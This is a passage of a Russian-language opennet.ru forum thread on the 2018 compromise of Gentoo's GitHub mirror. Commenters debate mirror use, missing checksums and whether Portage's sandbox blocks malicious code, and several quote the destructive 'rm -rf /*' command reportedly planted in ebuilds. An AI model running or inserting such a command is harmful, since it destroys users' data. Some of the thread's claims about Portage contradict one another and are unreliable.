Имеется ввиду, что данное зеркало предназначалось для разработчиков, в том числе для размещения там pull requests и их обсуждения. То есть пользователи не должны были обновляться именно с этого зеркала (оно не содержит Metadata с контрольными суммами архивов и самих ebuld'ов). Но некоторые зачем-то обновляются с него.

Для обновления через github обычно использовалось другое зеркало https://github.com/gentoo-mirror

> Gentoo же при соответсвующей настройке может синхронизировать репозиторий не с главного
> сервера, а с одного из зеркал.
> В любом случае ещё не до конца понятен масштаб бедствия, если злоумышленник
> из бывших разработчиков, то и основные сервера могут иметь необнаруженные взломы.

Ходят слухи, что тот у кого увели аккаунт во всех инфраструктуре доступ заблокировали в данный момент.


Ответить | Правка | ^ к родителю #65 | Наверх | Cообщить модератору

75. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от danonimous (?), 29-Июн-18, 16:26 
Т.е. оно и было выбрано для добавления rm -rf /* из-за отсутствия контрольных сумм?
Понятно, спасибо за разъяснение!
Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

77. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 29-Июн-18, 16:53 
Можно и контрольные суммы было б подменить, если б они там лежали, но пришлось бы для каждого подправленного ebuild их править или запускать repoman. С этого зеркало дерево на рабочих машинах не предполагается обновлять.

То есть обычно с него тянут себе репозиторий для внесения изменений и закидывания их обратно для рассмотрения.

Ответить | Правка | ^ к родителю #75 | Наверх | Cообщить модератору

95. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от слакварщик (?), 30-Июн-18, 11:20 

> Имеется ввиду, что данное зеркало предназначалось для разработчиков, в том числе для
> размещения там pull requests и их обсуждения. То есть пользователи не
> должны были обновляться именно с этого зеркала (оно не содержит Metadata
> с контрольными суммами архивов и самих ebuld'ов). Но некоторые зачем-то обновляются
> с него.

Не для разработчиков, у девов есть коммит. Для юзеров, заместо багзиллы

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

100. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от yep (?), 02-Июл-18, 02:15 
>> Имеется ввиду, что данное зеркало предназначалось для разработчиков, в том числе для
>> размещения там pull requests и их обсуждения. То есть пользователи не
>> должны были обновляться именно с этого зеркала (оно не содержит Metadata
>> с контрольными суммами архивов и самих ebuld'ов). Но некоторые зачем-то обновляются
>> с него.
> Не для разработчиков, у девов есть коммит. Для юзеров, заместо багзиллы

Что есть? Девелоперы имеющие права коммитить в webgit.gentoo.org могут коммитить туда, но есть девелоперы без такого права и всё что им остаётся: отправлять коммиты письмами (или ebuild) или оставлять pull request на github.

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

107. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Клыкастый (ok), 03-Июл-18, 14:39 
> и всё что им остаётся: отправлять коммиты письмами (или ebuild) или оставлять pull request на github.

сколько безысходности в этой фразе... а тут ещё PR на GH не отправишь... жесть какая...


Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

102. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от yep (?), 02-Июл-18, 02:21 
> Жесть, вообще. Как раз читаю уже несколько дней Gentoo Handbook, собираюсь накатить
> на сервер с коллекцией моих фотографий и других файлов, накопленных за
> всю жизнь.
> Вот где rm /* -rf натворило бы дел!

Не натворил бы: portage, емнип, не допускает запуска bash команд снаружи функций в ebuild-скриптах.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

110. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от JL2001 (ok), 10-Июл-18, 09:34 
>> Жесть, вообще. Как раз читаю уже несколько дней Gentoo Handbook, собираюсь накатить
>> на сервер с коллекцией моих фотографий и других файлов, накопленных за
>> всю жизнь.
>> Вот где rm /* -rf натворило бы дел!
> Не натворил бы: portage, емнип, не допускает запуска bash команд снаружи функций
> в ebuild-скриптах.

а тут говорят что допускает
https://www.opennet.ru/openforum/vsluhforumID3/114710.html#40

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

55. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (55), 29-Июн-18, 13:25 
Вот поэтому я не доверяю новомодным дистрибутивам и мелкомягким. Вечно с ними куча проблем и никогда не поймешь кто виноват.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

62. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от имя (?), 29-Июн-18, 14:39 
>новомодным дистрибутивам

небось лфс конпеляешь по ночам?

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

106. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от . (?), 03-Июл-18, 14:11 
шлакваре - сказано же, новомодным не доверяет. Твой lfs, если верить викивракии, сляпали в 99м, то есть он всего на пол-года старше генты - олдовые сисадмины на такой модный шлак не ведутся.

Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

60. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от user90 (?), 29-Июн-18, 14:10 
А в новостях-то.. "киберпреступники", "хакеры" :) Но по исполнению похоже на обычную школоту. Кстати "взломали" тоже некорректно пока нет подробностей.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

74. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Клыкастый (ok), 29-Июн-18, 16:04 
Иногда то, что лежит на поверхности - это только лишь то, что лежит на поверхности.
Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

61. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от кочегар духовки (?), 29-Июн-18, 14:20 
Там они(?) еще и на freenode прыгнули.
https://freenode.net/news/security-update-rpa
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

66. "Взломана инфраструктура проекта Gentoo на GitHub"  +4 +/
Сообщение от Аноним (66), 29-Июн-18, 15:06 
https://i.imgur.com/meklXMw.jpg
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

67. "Взломана инфраструктура проекта Gentoo на GitHub"  –7 +/
Сообщение от VINRARUS (ok), 29-Июн-18, 15:08 
>rm -fr /*

Видимо французы не любят Генту. Странно, думал они любители всяких извращений.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

79. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (79), 29-Июн-18, 18:28 
микрософт как никак
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

87. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от Michael Shigorinemail (ok), 30-Июн-18, 00:08 
> микрософт как никак

Да ладно, на первый раз же случайность ;-)  Совпадение и закономерность -- два последующих этапа.

Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

103. "Взломана инфраструктура проекта Gentoo на GitHub"  +1 +/
Сообщение от runoverheads (ok), 02-Июл-18, 11:36 
> "rm -fr /*"

ничего не произойдёт.
в генту ебилды и сборка выполняются в chroot и sandbox'е специально на такие случаи. а то запилит какой-нибудь вася rm -rf в свой make

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

105. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (105), 02-Июл-18, 19:19 
Подробности компроментации не всплыли?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру